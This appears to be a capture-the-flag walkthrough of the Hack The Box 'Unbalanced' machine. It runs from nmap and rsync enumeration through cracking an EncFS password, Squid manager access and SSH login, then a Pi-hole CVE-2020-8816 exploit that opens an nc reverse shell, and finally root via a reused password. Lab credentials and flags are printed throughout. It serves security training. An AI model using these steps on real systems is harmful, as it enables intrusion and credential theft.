NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-07 12:49 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating Ping Scan at 12:49
Scanning 10.10.10.200 [4 ports]
Completed Ping Scan at 12:49, 0.48s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:49
Scanning intranet.unbalanced.htb (10.10.10.200) [1000 ports]
Discovered open port 22/tcp on 10.10.10.200
Discovered open port 873/tcp on 10.10.10.200
Discovered open port 3128/tcp on 10.10.10.200
Completed SYN Stealth Scan at 12:49, 13.69s elapsed (1000 total ports)
Initiating Service scan at 12:49
Scanning 3 services on intranet.unbalanced.htb (10.10.10.200)
Completed Service scan at 12:52, 198.68s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against intranet.unbalanced.htb (10.10.10.200)
adjust_timeouts2: packet supposedly had rtt of -943567 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -943567 microseconds. Ignoring time.
Retrying OS detection (try #2) against intranet.unbalanced.htb (10.10.10.200)
Initiating Traceroute at 12:53
Completed Traceroute at 12:53, 1.79s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:53
Completed Parallel DNS resolution of 2 hosts. at 12:53, 1.74s elapsed
NSE: Script scanning 10.10.10.200.
Initiating NSE at 12:53
Completed NSE at 12:53, 41.20s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 4.36s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Nmap scan report for intranet.unbalanced.htb (10.10.10.200)
Host is up (0.86s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
| 256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_ 256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
100/tcp filtered newacct
541/tcp filtered uucp-rlogin
873/tcp open rsync?
1007/tcp filtered unknown
1022/tcp filtered exp2
1322/tcp filtered novation
2000/tcp filtered cisco-sccp
2040/tcp filtered lam
2160/tcp filtered apc-2160
2251/tcp filtered dif-port
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
3546/tcp filtered unknown
3551/tcp filtered apcupsd
5510/tcp filtered secureidprop
6667/tcp filtered irc
7106/tcp filtered unknown
8089/tcp filtered unknown
8899/tcp filtered ospf-lite
9500/tcp filtered ismserver
32771/tcp filtered sometimes-rpc5
52869/tcp filtered unknown
54328/tcp filtered unknown
Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 15.187 days (since Thu Jul 23 08:24:14 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 23/tcp)
HOP RTT ADDRESS
1 777.99 ms 10.10.14.1
2 778.17 ms intranet.unbalanced.htb (10.10.10.200)
NSE: Script Post-scanning.
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 285.84 seconds
Raw packets sent: 1632 (75.040KB) | Rcvd: 1252 (63.479KB)
ADDING DOMAINS INTO /etc/hosts
unbalanced.htb
intranet.unbalanced.htb
Lets Go to this domain first
Here we got nothing working as of till now!!!
ENUMERATING RSYNC PORT 873
LINK TO TAKE HELP FROM
https://medium.com/@minimalist.ascent/enumerating-rsync-servers-with-examples-cc3718e8e2c0
Getting Directory which we could get access to or can be synced
┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #rsync -rdt rsync://10.10.10.200:873 conf_backups EncFS-encrypted configuration backups
Downloading and Enumerating Further
┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #rsync -rdt rsync://10.10.10.200:873/conf_backups conf_backups ┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #ls conf_backups ┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #cd conf_backups/ ┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups] └──╼ #ls 0K72OfkNRRx3-f0Y6eQKwnjn jIY9q65HMBxJqUW48LJIc,Fj 27FonaNT2gnNc3voXuKWgEFP4sE9mxg0OZ96NB0x4OcLo- Kb-,NDTgYevHOGdHCYsSQhhIHrUGjiM6i2JZcl,-PKAJm0 2VyeljxHWrDX37La6FhUGIJS kdJ5whfqyrkk6avAhlX-x0kh 3cdBkrRF7R5bYe1ZJ0KYy786 kheep9TIpbbdwNSfmNU1QNk- 3E2fC7coj5,XQ8LbNXVX9hNFhsqCjD-g3b-7Pb5VJHx3C1 Kpo3MHQxksW2uYX79XngQu-f 3xB4vSQH-HKVcOMQIs02Qb9, KPYfvxIoOlrRjTY18zi8Wne- 4J8k09nLNFsb7S-JXkxQffpbCKeKFNJLk6NRQmI11FazC1 KtFc,DR7HqmGdPOkM2CpLaM9 5-6yZKVDjG4n-AMPD65LOpz6-kz,ae0p2VOWzCokOwxbt, l,LY6YoFepcaLg67YoILNGg0 5FTRnQDoLdRfOEPkrhM2L29P lWiv4yDEUfliy,Znm17Al41zi0BbMtCbN8wK4gHc333mt, 5IUA28wOw0wwBs8rP5xjkFSs mMGincizgMjpsBjkhWq-Oy0D 6R1rXixtFRQ5c9ScY8MBQ1Rg Mv5TtpmUNnVl-fgqQeYAy8uu 7-dPsi7efZRoXkZ5oz1AxVd-Q,L05rofx0Mx8N2dQyUNA, MxgjShAeN6AmkH2tQAsfaj6C 7zivDbWdbySIQARaHlm3NbC-7dUYF-rpYHSQqLNuHTVVN1 Ni8LDatT134DF6hhQf5ESpo5 8CBL-MBKTDMgB6AT2nfWfq-e Nlne5rpWkOxkPNC15SEeJ8g, 8e6TAzw0xs2LVxgohuXHhWjM OFG2vAoaW3Tvv1X2J5fy4UV8 8XDA,IOhFFlhh120yl54Q0da oPu0EVyHA6,KmoI1T,LTs83x 9F9Y,UITgMo5zsWaP1TwmOm8EvDCWwUZurrL0TwjR,Gxl0 OvBqims-kvgGyJJqZ59IbGfy A4qOD1nvqe9JgKnslwk1sUzO pfTT,nZnCUFzyPPOeX9NwQVo a4zdmLrBYDC24s9Z59y-Pwa2 pn6YPUx69xqxRXKqg5B5D2ON Acv0PEQX8vs-KdK307QNHaiF q5RFgoRK2Ttl3U5W8fjtyriX B6J5M3OP0X7W25ITnaZX753T qeHNkZencKDjkr3R746ZzO5K c9w3APbCYWfWLsq7NFOdjQpA sfT89u8dsEY4n99lNsUFOwki ,CBjPJW4EGlcqwZW4nmVqBA6 sNiR-scp-DZrXHg4coa9KBmZ Chlsy5ahvpl5Q0o3hMyUIlNwJbiNG99DxXJeR5vXXFgHC1 StlxkG05UY9zWNHBhXxukuP9 cwJnkiUiyfhynK2CvJT7rbUrS3AEJipP7zhItWiLcRVSA1 TZGfSHeAM42o9TgjGUdOSdrd dF2GU58wFl3x5R7aDE6QEnDj uEtPZwC2tjaQELJmnNRTCLYU dNTEvgsjgG6lKBr8ev8Dw,p7 vCsXjR1qQmPO5g3P3kiFyO84 ECXONXBBRwhb5tYOIcjjFZzh VQjGnKU1puKhF6pQG1aah6rc F4F9opY2nhVVnRgiQ,OUs-Y0 W5,ILrUB4dBVW-Jby5AUcGsz FGZsMmjhKz7CJ2r-OjxkdOfKdEip4Gx2vCDI24GXSF5eB1 waEzfb8hYE47wHeslfs1MvYdVxqTtQ8XGshJssXMmvOsZLhtJWWRX31cBfhdVygrCV5 -FjZ6-6,Fa,tMvlDsuVAO7ek Wr0grx0GnkLFl8qT3L0CyTE6 FSXWRSwW6vOvJ0ExPK0fXJ6F X93-uArUSTL,kiJpOeovWTaP gK5Z2BBMSh9iFyCFfIthbkQ6 Ya30M5le2NKbF6rD-qD3M-7t gRhKiGIEm4SvYkTCLlOQPeh- Yw0UEJYKN,Hjf-QGqo3WObHy hqZXaSCJi-Jso02DJlwCtYoz Z8,hYzUjW0GnBk1JP,8ghCsC iaDKfUAHJmdqTDVZsmCIS,Bn ZvkMNEBKPRpOHbGoefPa737T IymL3QugM,XxLuKEdwJJOOpi ZXUUpn9SCTerl0dinZQYwxrx ┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups] └──╼ #
After google I came to know about some file name called .encfs6.xml where it stored password for this decryption method
Here we got this file and password we got is this
Now here we cannot directly go for searching and cracking cuz we have salt hash so to do that we need to use john
┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups] └──╼ #python /opt/metasploit/john/bin/encfs2john.py . > ../hash ┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups] └──╼ #cd .. ┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #ls conf_backups hash ┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #cat hash .:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add ┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #
Cracking hash password
So here i have already cracked the password so i ll be using show command
┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #locate encfs2john /opt/metasploit/john/bin/encfs2john.py /usr/share/john/encfs2john.py ┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #python /usr/share/john/encfs2john.py conf_backups/ > file.hash ┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #john --show file.hash conf_backups/:bubblegum 1 password hash cracked, 0 left
Now mounting Files and enumerating through them by decryptinh the mounted folder cuz to decrypt that folder we need to mount
https://linuxconfig.org/how-to-encrypt-directory-with-encfs-on-debian-9-stretch
┌─[root@liquid]─[~] └──╼ #encfs ~/Desktop/HTB/unbalanced/conf_backups/ ~/decrypted-data/ EncFS Password: ┌─[root@liquid]─[~] └──╼ #cd decrypted-data/ ┌─[root@liquid]─[~/decrypted-data] └──╼ #ls 50-localauthority.conf hdparm.conf parser.conf 50-nullbackend.conf host.conf protect-links.conf 51-debian-sudo.conf initramfs.conf reportbug.conf 70debconf input.conf resolv.conf 99-sysctl.conf journald.conf resolved.conf access.conf kernel-img.conf rsyncd.conf adduser.conf ldap.conf rsyslog.conf bluetooth.conf ld.so.conf semanage.conf ca-certificates.conf libaudit.conf sepermit.conf com.ubuntu.SoftwareProperties.conf libc.conf sleep.conf dconf limits.conf squid.conf debconf.conf listchanges.conf sysctl.conf debian.conf logind.conf system.conf deluser.conf logrotate.conf time.conf dhclient.conf main.conf timesyncd.conf discover-modprobe.conf mke2fs.conf ucf.conf dkms.conf modules.conf udev.conf dns.conf namespace.conf update-initramfs.conf dnsmasq.conf network.conf user.conf docker.conf networkd.conf user-dirs.conf fakeroot-x86_64-linux-gnu.conf nsswitch.conf Vendor.conf framework.conf org.freedesktop.PackageKit.conf wpa_supplicant.conf fuse.conf PackageKit.conf x86_64-linux-gnu.conf gai.conf pam.conf xattr.conf group.conf pam_env.conf
Here we will be checking SQUID.CONF as we have port open for that
Data we found in that file
So here we got some IP and pass which we will be using as below
Now if we google about cache mgrpasswd we will get number of links but helpfull one will be which i used is this
After going through this we will be checking out this command
┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
Here it will give cache stats as in memcache stats
┌─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache HTTP/1.1 200 OK Server: squid/4.6 Mime-Version: 1.0 Date: Sat, 08 Aug 2020 17:50:41 GMT Content-Type: text/plain;charset=utf-8 Expires: Sat, 08 Aug 2020 17:50:41 GMT Last-Modified: Sat, 08 Aug 2020 17:50:41 GMT X-Cache: MISS from unbalanced X-Cache-Lookup: MISS from unbalanced:3128 Via: 1.1 unbalanced (squid/4.6) Connection: close FQDN Cache Statistics: FQDNcache Entries In Use: 19 FQDNcache Entries Cached: 14 FQDNcache Requests: 25674 FQDNcache Hits: 0 FQDNcache Negative Hits: 13844 FQDNcache Misses: 11830 FQDN Cache Contents: Address Flg TTL Cnt Hostnames 10.10.14.154 N 055 0 127.0.1.1 H -001 2 unbalanced.htb unbalanced ::1 H -001 3 localhost ip6-localhost ip6-loopback 172.31.179.2 H -001 1 intranet-host2.unbalanced.htb 172.31.179.3 H -001 1 intranet-host3.unbalanced.htb 10.10.10.200 N -15303 0 127.0.0.1 H -001 1 localhost 172.17.0.1 H -001 1 intranet.unbalanced.htb ff02::1 H -001 1 ip6-allnodes ff02::2 H -001 1 ip6-allrouters 10.10.16.8 N -49408 0 10.10.14.110 N -4338 0 10.10.14.69 N -9212 0 10.10.16.85 N -2885 0
BEFORE GOING THROUGH ANY PAGE ADD THIS MACHINE IP AND SQUID PROXY INTO YOUR PROXY SETUP AS IP WILL BE 10.10.10.200 AND PORT WILL BE 3128 JUST AS WE DID THIS IN CASE OF BURP WHERE WE SET IT TO 127.0.0.1 AND PORT WAS 8080
Here we got 2 IP which have same domain which we found during nmap results
LOGIN TO WEBPAGE
Here we will be using SQL injection login commands
Here we go with some users here :
Lets create a list of this user and will try to generate passwords for these users
Passwords which we got are !!
Here i had to take help from someone to get this done but did this 🙂
bryan :: ireallyl0vebubblegum!!!
GETTING USER ACCESS
bryan :: ireallyl0vebubblegum!!!
┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #ssh bryan@10.10.10.200 bryan@10.10.10.200's password: Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Aug 8 13:12:09 2020 from 10.10.15.58 bryan@unbalanced:~$ id uid=1000(bryan) gid=1000(bryan) groups=1000(bryan) bryan@unbalanced:~$ cat user.txt 12840aaf879e39d87975c0e927539458 bryan@unbalanced:~$
Here we have another file also named TODO
bryan@unbalanced:~$ cat TODO ############ # Intranet # ############ * Install new intranet-host3 docker [DONE] * Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE] * Test intranet-host3 [DONE] * Add intranet-host3 to load balancer [DONE] * Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE] * Fix intranet-host2 [DONE] * Re-add intranet-host2 to load balancer (set default weight) [DONE] - Fix intranet-host1 [TODO] - Re-add intranet-host1 to load balancer (set default weight) [TODO] ########### # Pi-hole # ########### * Install Pi-hole docker (only listening on 127.0.0.1) [DONE] * Set temporary admin password [DONE] * Create Pi-hole configuration script [IN PROGRESS] - Run Pi-hole configuration script [TODO] - Expose Pi-hole ports to the network [TODO] bryan@unbalanced:~$
So I tried Linpeas But got nothing
So I went to check for netstat which was not installed but we have alternative for that
https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
bryan@unbalanced:~$ awk 'function hextodec(str,ret,n,i,k,c){
> ret = 0
> n = length(str)
> for (i = 1; i <= n; i++) {
> c = tolower(substr(str, i, 1))
> k = index("123456789abcdef", c)
> ret = ret * 16 + k
> }
> return ret
> }
> function getIP(str,ret){
> ret=hextodec(substr(str,index(str,":")-2,2));
> for (i=5; i>0; i-=2) {
> ret = ret"."hextodec(substr(str,i,2))
> }
> ret = ret":"hextodec(substr(str,index(str,":")+1,4))
> return ret
> }
> NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp
Local - Remote
0.0.0.0:873 - 0.0.0.0:0
127.0.0.1:8080 - 0.0.0.0:0
127.0.0.1:5553 - 0.0.0.0:0
0.0.0.0:53 - 0.0.0.0:0
0.0.0.0:22 - 0.0.0.0:0
10.10.10.200:22 - 10.10.14.149:54896
10.10.10.200:22 - 10.10.14.132:40326
10.10.10.200:22 - 10.10.15.58:58698
127.0.0.1:8080 - 127.0.0.1:43034
172.31.0.1:43408 - 172.31.11.3:80
127.0.0.1:43034 - 127.0.0.1:8080
10.10.10.200:22 - 10.10.14.154:46330
bryan@unbalanced:~$
Here we go with another open ports 8080 5553
Lets Go for these ports enumeration
bryan@unbalanced:~$ curl http://127.0.0.1:5553 ^C bryan@unbalanced:~$ curl http://127.0.0.1:8080 [ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>
Here i got 0 results but port 8080 was asking for domain!
bryan@unbalanced:~$ curl http://127.0.0.1:8080 -H 'Host: unbalanced'
<!DOCTYPE html>
<!-- Pi-hole: A black hole for Internet advertisements
* (c) 2017 Pi-hole, LLC (https://pi-hole.net)
* Network-wide ad blocking via your own hardware.
*
* This file is copyright under the latest version of the EUPL. -->
<----->
<input id="bpWLPassword" type="password" placeholder="Javascript disabled" disabled/><button id="bpWhitelist" type="button" disabled></button>
</form>
</div>
</main>
<footer><span>Saturday 6:12 PM, August 08th.</span> Pi-hole v4.3.2-0-ge41c4b5 (pihole.unbalanced.htb/172.31.11.3)</footer>
</div>
<script>
function add() {
$("#bpOutput").removeClass("hidden error exception");
$("#bpOutput").addClass("add");
var domain = "unbalanced";
var pw = $("#bpWLPassword");
<----->
Here we got IP and pihole running on that ip with version 4.3.2 which is vulnerable to RCE
SO lets Get That Shit done!! As we are given soem steps in TODO list >>
So script we will be using is this :
https://github.com/AndreyRainchik/CVE-2020-8816/blob/master/CVE-2020-8816.py
To make it work successfully we need to execute these command on our machine so we will have to port forward 8080 on our machine
┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #ssh -NL 8080:127.0.0.1:8080 bryan@10.10.10.200 bryan@10.10.10.200's password:
Here we port forwarded this so lets run our script :
┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #python3 exploitpihole.py http://127.0.0.1:8080 admin 10.10.14.132 9001 Attempting to verify if Pi-hole version is vulnerable ^[[Logging in... Login succeeded Grabbing CSRF token Attempting to read $PATH Pihole is vulnerable and served's $PATH allows PHP Sending payload
LISTENING ON PORT
┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #nc -lnvp 9001 listening on [any] 9001 ... connect to [10.10.14.132] from (UNKNOWN) [10.10.10.200] 47558 /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ pwd /var/www/html/admin $ hostname pihole.unbalanced.htb $
GETTING ROOT ACCESS
Here I was able to read root directory file of this hostname
$ cd /root pwd $ /root $ pwd /root $ ls ph_install.sh pihole_config.sh $ cat pihole_config.sh #!/bin/bash # Add domains to whitelist /usr/local/bin/pihole -w unbalanced.htb /usr/local/bin/pihole -w rebalanced.htb # Set temperature unit to Celsius /usr/local/bin/pihole -a -c # Add local host record /usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1 # Set privacy level /usr/local/bin/pihole -a -l 4 # Set web admin interface password /usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!' # Set admin email /usr/local/bin/pihole -a email admin@unbalanced.htb $
Here I got another password So i Just tried to use this for root and it worked
┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced] └──╼ #ssh bryan@10.10.10.200 bryan@10.10.10.200's password: Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Aug 8 14:04:13 2020 from 10.10.14.132 bryan@unbalanced:~$ id uid=1000(bryan) gid=1000(bryan) groups=1000(bryan) bryan@unbalanced:~$ su root Password: root@unbalanced:/home/bryan# id uid=0(root) gid=0(root) groups=0(root) root@unbalanced:/home/bryan# cd /root root@unbalanced:~# ls root.txt root@unbalanced:~# cat root.txt a00801226119423990cecfe56f7b39c1 root@unbalanced:~#
Here we go with our root flag!!
This machine was difficult for me during SQUID PROXY part
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE